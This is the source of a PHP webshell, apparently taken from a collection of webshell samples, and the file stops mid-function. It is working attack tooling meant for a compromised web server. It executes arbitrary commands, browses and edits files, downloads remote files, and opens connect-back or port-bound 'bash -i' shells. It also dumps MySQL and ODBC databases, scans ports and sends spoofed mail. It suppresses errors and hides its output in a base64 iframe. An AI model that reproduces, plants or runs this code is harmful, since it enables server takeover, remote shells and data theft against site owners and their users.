webshells/php/php-include-w-shell.php

<?php
######################################################################
# we decide if we want syslogging
closelog();
######################################################################
# define variables
######################################################################

# error_reporting(E_ALL);
error_reporting(0);

# get globals even if register_globals is off
import_globals();

$safe_mode = ini_get('safe_mode');
$register_globals = ini_get('register_globals');
$magic_quotes_gpc = ini_get('magic_quotes_gpc');
$txt['en']['on']="on";
$txt['en']['off']="off";
$txt['de']['on']="an";
$txt['de']['off']="aus";
$lang="en";

if($safe_mode == 1) $SM = $txt[$lang]['on'];
else { 
	$SM = $txt[$lang]['off'];
	# set_time_limit(9000);
}
if($register_globals == 1) $RG = $txt[$lang]['on'];
else $RG = $txt[$lang]['off'];
if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on'];
else $MQ = $txt[$lang]['off'];

# navigatable functions
$ArrFuncs = array(
	"dropinc"	=> 0,
	"filecopy"	=> 0,
	"fileedit"	=> 0,
	"showsource"	=> 0,
	"snoop"		=> 0,
	"cmdln"		=> 0,
	"connectback"	=> 0,
	"phpshell"	=> 0,
	"servicecheck"	=> 0,
	"mysqlaccess"	=> 0,
	"mail"		=> 0,
	"env"		=> 0,
	"phpenv"	=> 0,
	"phpinfo"	=> 0,
	"dumpvars"	=> 0,
	"debugscript"	=> 0,
	"syslog"	=> 0
);

# init navigation
foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;



# set default values
$ArrDefaults = array(
	"filecopy_source" => "http://...",
	"filecopy_dest" => getcwd(),
	"cmdcall" => "",
	"editfile" => getcwd(),
	"editcontent" => "",
	"chdir" => ".",
	"vsource" => $SCRIPT_FILENAME,
	"mail_from" => "attacker@0wned.org",
	"mail_to" => "",
	"mail_subject" => "", 
	"mail_attach_source"  => "http://....",
	"mail_attach_appear"  => "filename...",
	"mail_content_type"   => "image/png",
	"mail_msg" => "",
	"tcpports" => "21 22 23 25 80 110",
	"timeout" => 5,
	"miniinc_loc" => getcwd() . "/miniinc.php",
	"incdbhost" => "localhost",
	"cbhost" => $_SERVER['REMOTE_ADDR'],
	"cbport" => 20202,
	"cbtempdir" => "/tmp",
	"cbcompiler" => "gcc",
	"phpshellapp" => "export TERM=xterm; bash -i",
	"phpshellhost" => "0.0.0.0",
	"phpshellport" => "20202"
);

# init defaults
foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;

# define executable functions
$Mstr = array(
	0 => "No execute functions available!",
	1 => "passthru()",
	2 => "system()",
	3 => "backticks",
	4 => "proc_open()",
	5 => "exec()"
);

# clean request to avoid uri monster
$SREQ = "";
$reqdat = array();
$tmpCount=0;
foreach($REQUESTS as $key => $val){
	if($tmpCount==0) $reqdat[] = $key."=".$val;
	else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
	$tmpCount++;
}
$SREQ = implode("&", $reqdat);
$tmpCount=0;
if($SREQ=="") {
	$tmp_req = array();
	$tmp_qry = explode("&", $QUERY_STRING);
	foreach($tmp_qry as $key => $val) {
		$tmp_val = explode("=", $val);
		if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
		else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
		$tmpCount++;
	}
	$SREQ = implode("&", $tmp_req);
}

if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot'];

# set some defaults to avaoid errors
$is_file   = array();
$is_dir    = array();
$is_w_dir  = array();
$is_w_file = array();
$emeth=0;
if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
$chdir = str_replace("//", "/", $chdir);
if(substr($chdir, -1) != "/") $chdir .= "/";
##
# Setup wether to use PHP_SELF or SCRIPT_NAME
if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
else $MyLoc = $SCRIPT_NAME;

# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;

# This is a list of internal inc.inc vars that do not get displayed 
# inside the dumpvars function (poss for a debug func later?)
$DebugArr = array(
	'ARHGFDGFGASDFG',
	'safe_mode',
	'register_globals',
	'magic_quotes_gpc',
	'txt',
	'lang',
	'SM',
	'RG',
	'MQ',
	'ArrFuncs',
	'val',
	'key',
	'env',
	'phpenv',
	'phpinfo',
	'debugscript',
	'filecopy',
	'fileedit',
	'showsource',
	'snoop',
	'mail',
	'cmdln',
	'syslog',
	'servicecheck',
	'dropinc',
	'mysqlaccess',
	'ArrDefaults',
	'filecopy_source',
	'filecopy_dest',
	'cmdcall',
	'editfile',
	'editcontent',
	'chdir',
	'vsource',
	'mail_from',
	'mail_to',
	'mail_subject',
	'mail_attach_source',
	'mail_attach_appear',
	'mail_content_type',
	'mail_msg',
	'tcpports',
	'timeout',
	'miniinc_loc',
	'incdbhost',
	'Mstr',
	'SREQ',
	'reqdat',
	'tmpCount',
	'is_file',
	'is_dir',
	'is_w_dir',
	'is_w_file',
	'emeth',
	'MyLoc',
	'dumpvarsare',
	'DebugArr',
	'cbtempdir',
	'cbcompiler',
	'cbhost',
	'cbport',
	'phpshelltype',
	'phpshellapp',
	'phpshellhost',
	'phpshellport'
);


# activate syslog entry
if($syslog == 1)
{
#	openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
#	drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
}
###############################################################################
#
# start include output 
#
###############################################################################
$strOutput = "";
$strOutput .= "<html><body bgcolor='#ffffff'>
<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'>
<center>
<h2>Include tool</h2>
PHP Version: " . phpversion() . " | 
safe_mode: $SM |
register_globals: $RG | 
magic_quotes_gpc: $MQ | 
syslogging: ";
if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
$strOutput .= "
<br><br>
</center>
<font color='#000000'>";
foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key); 

###############################################################################
# test cmd shell environment
###############################################################################
if($env == 1) { 
	$strOutput .= "
	<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr>
	<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>";
	if($emeth==0) { 
		$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>";
	} else {
		$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr>
		<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr>
		<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr>
		</table>";
	}
}

###############################################################################
# test php environment
###############################################################################
if($phpenv == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr>
		<tr><td colspan=2>posix infos</td><tr>";
		if(function_exists('posix_uname')) {
			$posix_uname = posix_uname();
			while (list($info, $value) = each ($posix_uname)) {
				$strOutput .= "<tr><td>$info</td><td>$value</td></tr>";
			}
		} else {
			$strOutput .= "posix_uname not available";
		}
		$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>";
		if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>";
		else $strOutput .= "posix_getuid not available";
		if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>";
		else $strOutput .= "posix_geteuid not available";
		if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>";
		else $strOutput .= "posix_getgid not available";
	$strOutput .= "</table>";
}


###############################################################################
# dump variables
###############################################################################
if($dumpvars == 1) {
	$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr>
	<tr><td>" . dd("GLOBALS") . "</td></tr>
	</table>";
}
###############################################################################
# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
if($debugscript == 1) { ?>
	<table border=1><tr><td><h3>debug script</h3></td></tr>
	<tr><td>
	<? ddb("DebugArr"); ?>
	</td></tr>
	</table>
<? }
###############################################################################
# copy file
###############################################################################
if($filecopy == 1) { 
	$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr>
	<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr>
	<tr><td>destination</td><td><input type=text name='filecopy_dest'  value='" . $filecopy_dest . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr>
	</form>
	</table>";
} 
###############################################################################
# edit file
###############################################################################
if($fileedit == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr>
	<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr>
	<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>"; 
	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
		$strOutput .= show_file($editfile);
	$strOutput .= "</textarea></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>";
	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
		$strOutput .= edit_file($editcontent,$editfile,$edit);
 	$strOutput .= "</td></tr>
	</table>
	</form>";
}
###############################################################################
# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
###############################################################################
if($cmdln == 1) {
	$emeth = test_cmd_shell();
	$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr>
	<tr><td colspan=2>";
	if($emeth < 3) {
		$strOutput .= "The output of this command will be somewhere on the page!";
		Mexec($cmdcall, $emeth);
	} else {
		$strOutput .= Mexec($cmdcall, $emeth);
	}
	$strOutput .= "</td></tr>
	</form>
	</table>";
}
###############################################################################
# sending mime mail
###############################################################################
if($mail == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr>
	<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr>
	<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr>
	<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr>
	<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr>
	<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr>
	<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr>
	</form>
	</table>";
}

###############################################################################
# drop mini inc handling
###############################################################################
if($dropinc == 1) { 
	if($loc!="") $miniinc_loc = $loc;
	$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr>
	<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2><pre>";
	if($minisave==1) $strOutput .= dropminiinc($miniinc_loc);
	$strOutput .= "</pre></td></tr>
	</form>
	</table>";
} 
###############################################################################
# connect C back shell handling
###############################################################################
if($connectback == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr>
	<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr>
	<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr>
	<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr>
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>";
	if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport);
	$strOutput .= "</td></tr></form></table>";
}

###############################################################################
# PHP shell handling
###############################################################################
if($phpshell == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>
	<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>
	<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>
	<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>";
	if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
	$strOutput .= "</td></tr></form></table>";
}


###############################################################################
# snooping
###############################################################################
if($snoop == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>
	<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>
	</form>
	</table>";
}
###############################################################################
# show highlited source
###############################################################################
if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>
	</form>
	</table>";
}
###############################################################################
# service check
###############################################################################
if($servicecheck == 1) {
if($servhost!="") $host = $servhost;
else $host = "localhost";

	$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr>
	<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr>
	<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr>
	<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr -->
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2><pre>";

	$hosts = explode(" ", $host);
	$port = explode(" ",$tcpports);
	$values = count($port);
	$numhosts = count($hosts);
	if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n";
	else if($values > 1) $strOutput .= "Checking $values ports..\n";
	else $strOutput .= "No ports specified!!\n";
	if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n";
	else if($numhosts == 1) $strOutput .= "On 1 host..\n";
	else $strOutput .= "No hosts specified!!\n";
	if($numhosts >= 1) {
		for($hcount=0; $hcount < $numhosts; $hcount++) {
			$tmphost = $hosts[$hcount];
			$strOutput .= "\nTesting $tmphost..\n";
			if(($values == 1 && $port[0] != "") | $values > 1) {
				for ($cont=0; $cont < $values; $cont++) {
					@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout);
					$service = getservbyport($port[$cont],"tcp");
					@$get = fgets($sock[$cont]);
					if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n";
					flush();
				}
			}
		}
	}
	$strOutput .= "</pre></td></tr>
	</form>
	</table>";
}
###############################################################################
# show phpinfo
###############################################################################
if($phpinfo == 1){ 
	phpinfo();
}
######################################################################
# db stuff
######################################################################
if($mysqlaccess == 1) {
	$strOutput .= "<table border=1>
	<form method='post' target='_parent' action='$MyLoc?$SREQ&'>
	<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr>
	<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr>
	<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr>
	<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr>
	<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr>
	<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr>
	<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr>
	<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr -->
	<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr>
	</table>";
}

if($incdbhost!="" && $incdbuser!="") {
	if($incdbvar!="") $dbh = $incdbhost;
	else $dbH = $incdbhost;
	$dbu = $incdbuser;
	$dbp = $incdbpass;
	if($incdbsql!="") $dbs = $incdbsql;
	if($incdbname!="") $dbn = $incdbname;
	if($incdbtable!="") $dbt = $incdbtable;
	if($incdbfile!="") $dumpfile = $incdbfile;
}

if(isset($dbh)) {
	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>";
	eval("\$Gdbhost = \"\$$dbh\";");
	eval("\$Gdbuser = \"\$$dbu\";");
	eval("\$Gdbpass = \"\$$dbp\";");
	eval("\$Gdbname = \"\$$dbn\";");
	$strOutput .= "<tr><td>";
	if($dbn=="") {
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
		"</td></tr><tr><td>" .
		display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
	} else if(isset($dbs)) {
		$Gdbsql = $dbs;
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql . 
		"</td></tr><tr><td>";
		if(isset($dumpfile)) {
			$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
		} else {
			$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
		}
	} else if(isset($dbt)) {
		$Gdbtabl = $dbt;
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
		$strOutput .= "</td></tr><tr><td>";
		if(isset($dumpfile)) {
			$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);		
		} else {
			$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
		}
	} else {
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
		"</td></tr><tr><td>" .
		display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}

if(isset($dbH)) {
	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>";
	if($dbn=="") {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
		"</td></tr><tr><td>".
		display_dbs($dbH, $dbu, $dbp);
	} else if(isset($dbs)) {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs.
		"</td></tr><tr><td>";
		if(isset($dumpfile)) {
			$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
		} else {
			$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
		}
	} else if(isset($dbt)) {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
		$strOutput .= "</td></tr><tr><td> ";
		if(isset($dumpfile)) {
			$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);		
		} else {
			$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
		}
	} else {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn .
		"</td></tr><tr><td>" .
		display_tables($dbH, $dbu, $dbp, $dbn);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}

if(isset($Odbh)) {
	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr>";
	eval("\$Gdbhost = \"\$$Odbh\";");
	eval("\$Gdbuser = \"\$$dbu\";");
	eval("\$Gdbpass = \"\$$dbp\";");
	eval("\$Gdbname = \"\$$dbn\";");
	$strOutput .= "<tr><td>";
	if(isset($dbt)) {
		$Gdbtabl = $dbt;
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl .
		"</td></tr><tr><td>" .
		display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
	} else {
		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
		"</td></tr><tr><td> " .
		Odisplay_tables($Gdbhost, $Gdbuser, $Gdbpass);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}

if(isset($OdbH)) {
	$strOutput .= "<table border=1><tr><td><b>odbc access</b></td></tr><tr><td>";
	if(isset($dbt)) {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
		"</td></tr><tr><td> " .
		Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
	} else {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
		"</td></tr><tr><td> " .
		Odisplay_tables($OdbH, $dbu, $dbp);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}


$strOutput .= "</font></td></tr></table>";
$strOutputB64 = chunk_split(base64_encode($strOutput));
echo "</div></div></div></div></div></div></div></div></div></div>\n";
echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">';

######################################################################
#
# functions
#
######################################################################
# make globals avail
function import_globals()  
{
	global $HTTP_SERVER_VARS;
	global $REMOTE_ADDR;  
	global $PHP_SELF;
	global $REQUESTS;
	global $SCRIPT_FILENAME;
	global $QUERY_STRING;
	global $SCRIPT_URI;
	global $SERVER_NAME;
	$_igr = ini_get('register_globals');
	if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC');
	if (phpversion() <= '4.1.0') {
		$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS); 
	} else {
		$REQUESTS = $_REQUEST;
	}
	if($_SERVER['PHP_SELF']=="") {
		$SERVER_NAME     = $HTTP_SERVER_VARS['SERVER_NAME'];
		$SCRIPT_URI      = $HTTP_SERVER_VARS['SCRIPT_URI'];
		$REMOTE_ADDR     = $HTTP_SERVER_VARS['REMOTE_ADDR'];
		$QUERY_STRING    = $HTTP_SERVER_VARS['QUERY_STRING'];
		$PHP_SELF        = $HTTP_SERVER_VARS['PHP_SELF'];
		$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME'];
	} else {
		$SERVER_NAME     = $_SERVER['SERVER_NAME'];
		$SCRIPT_URI      = $_SERVER['SCRIPT_URI'];
		$REMOTE_ADDR     = $_SERVER['REMOTE_ADDR'];
		$QUERY_STRING    = $_SERVER['QUERY_STRING'];
		$PHP_SELF        = $_SERVER['PHP_SELF'];
		$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME'];
	}
}

function dd($v) {
	global $DebugArr;
	$rv = "<blockquote>\n";
	$q="while(list(\$key,\$val) = each(\$$v)) {".
	' if(array_search($key, $DebugArr)) {'.
	' } else if((is_array($val)) && ($key!="GLOBALS")) {'.
	'  echo "<b>$key</b>>><br/>";'.
	'  @dd($v."[".$key."]");'.
	' } else if($key=="GLOBALS") {'.
	' } else echo "<b>$key</b>=>$val<br/>";'.
	'};';
	eval($q);
	echo "</blockquote>\n";
}

function ddb($v) {
	echo "<blockquote>\n";
	$q="while(list(\$key,\$val) = each(\$$v)) {".
	' if((is_array($val)) && ($key!="GLOBALS")) {'.
	'  echo "<b>$key</b>>><br/>";'.
	'  @dd($v."[".$key."]");'.
	' } else if($key=="GLOBALS") {'.
	' } else echo "<b>$key</b>=>$val<br/>";'.
	'};';
	eval($q);
	echo "</blockquote>\n";
}

######################################################################
# cmd shell functions
######################################################################
# test what cmd is working
function test_cmd_shell(){
	if(strlen(Mexec("pwd", 5))>11)     $var = 5;
	elseif(strlen(Mexec("pwd", 4))>11) $var = 4;
	elseif(strlen(Mexec("pwd", 3))>11) $var = 3;
	elseif(strlen(Mexec("pwd", 2))>0) $var = 2;
	elseif(strlen(Mexec("pwd", 1))>0) $var = 1;
	else $var = 0;
	return $var;
}
# function for executing cmds
function Mexec($Mcmd, $type) {
	if($Mcmd != ""){
		$dspec = array(
			0 => array("pipe", "r"),
			1 => array("pipe", "w"),
			2 => array("pipe", "r")
		);
		$output = "";
		switch($type) {
			case 5:
				$output .= "<pre>";
				$lastline = exec($Mcmd, $arrOutput);
				foreach($arrOutput as $val) {
					$output .= $val . "\n";
				}
				$output .= "</pre>";
				break;
			case 4:
				$proc = proc_open($Mcmd, $dspec, $pipes);
				if (is_resource($proc)) {
					$output .= "<pre>";
					fclose($pipes[0]);
					while(!feof($pipes[1])) {
						$tmp = fgets($pipes[1], 1024);
						$output .= $tmp;
					}
					$output .= "</pre>";
				}
				break;
			case 3;
				$output .= "<pre>";
				$output .= `$Mcmd`;
				$output .= "</pre>";
				break;
			case 2;
				print "<pre>\n";
				$output = system($Mcmd);
				print "</pre>\n";
				break;
			case 1;
				print "<pre>\n";
				$output = passthru($Mcmd);
				print "</pre>\n";
				break;
			case 0;
			default;
				$output = "There are no execute functions available!";
				break;
		}
		return $output;
	}	
}
function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) {
	$msgerror = "";
	if($msg == "") $msgerror = "please enter a message";
	elseif($subject == "") $msgerror = "please enter a subject";
	else {
		$stlf = md5(uniqid(time())); 
		$attach = "";
		$fp = fopen($attach_source, "rb"); 
		if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); } 
		$header = "From: $from\n"; 
		$header .= "MIME-Version: 1.0\n"; 
		$header .= "Content-Type: multipart/mixed; boundary=$stlf\n\n"; 
		$header .= "This is a multi-part message in MIME format\n"; 
		$header .= "--$stlf\n"; 
		$header .= "Content-Type: text/plain\n"; 
		$header .= "Content-Transfer-Encoding: 8bit\n\n"; 
		$header .= "$msg\n"; 
		$header .= "--$stlf\n"; 
		$header .= "Content-Type: $content_type; name=$attach_appear\n"; 
		$header .= "Content-Transfer-Encoding: base64\n"; 
		$header .= "Content-Disposition: attachment; filename=$attach_appear\n\n"; 
		$header .= chunk_split(base64_encode($attach)); 
		$header .= "\n"; 
		$header .= "--$stlf--"; 
		mail($to,$subject,"",$header); 
		$msgerror = "send done - show header: <br>\n<pre>$header</pre> ";
	} 
	return $msgerror;
}

######################################################################
# system browsing
######################################################################

function make_switch($val){
	global $txt;
	global $lang;
	global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER;
	if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; }
	else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; }
	return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> ";
}
function drop_syslog_warning($msg) {
	global $syslog;
#	if($syslog == 1) syslog(LOG_WARNING,$msg);
}

######################################################################
# file functions
######################################################################
function copy_file($source,$dest) {
	$dataout = "";
	if($source == "")  $dataout .= "enter source<br>\n";
	if($dest != "") {
		ini_set("user_agent","m0ins downloader");
		if(!copy($source, $dest)) $dataout . "failed to copy ...<br>\n";
		if(file_exists($dest)) $dataout .= highlight_file($dest, 1);
	} else {
		$dataout .= "enter destination";
	}
}
function edit_file($cont,$dest,$do) {
	$dataout = "";
	global $magic_quotes_gpc;
	if(file_exists($dest)) {
		if($do == 1){
			$fh = fopen($dest, "w");		
			if(!$fh) {
				$dataout .= "unable to open <b>$dest</b>.\n";
			} else {
#				$cont = str_replace("&gt;", ">", str_replace("&lt;", "<", $cont));
				if($magic_quotes_gpc == 1) $cont = stripslashes($cont);
